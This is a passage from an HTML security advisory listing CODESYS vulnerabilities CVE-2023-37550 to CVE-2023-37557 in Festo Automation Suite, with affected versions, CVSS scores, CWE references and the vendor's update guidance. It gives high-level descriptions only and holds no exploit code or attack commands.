<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37550</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37549.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37550">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37551</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specially crafted network communication requests can utilize the CmpApp component to download files with any file extensions to the controller. In contrast to the regular file download via CmpFileTransfer, no filtering of certain file types is performed here. As a result, the integrity of the CODESYS control runtime system may be compromised by the files loaded onto the controller.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37551">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/552.html">CWE-552 Files or Directories Accessible to External Parties</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37552</a></h3>
<div class="csaf-accordion-content">
<p>In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37553, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37552">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37553</a></h3>
<div class="csaf-accordion-content">
<p>In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37553">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37554</a></h3>
<div class="csaf-accordion-content">
<p>In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37555 and CVE-2023-37556.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37554">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37555</a></h3>
<div class="csaf-accordion-content">
<p>In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37556.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37555">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37556</a></h3>
<div class="csaf-accordion-content">
<p>In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37555.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37556">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37557</a></h3>
<div class="csaf-accordion-content">
<p>After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted remote communication requests can cause the CmpAppBP component to overwrite a heap-based buffer, which can lead to a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37557">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
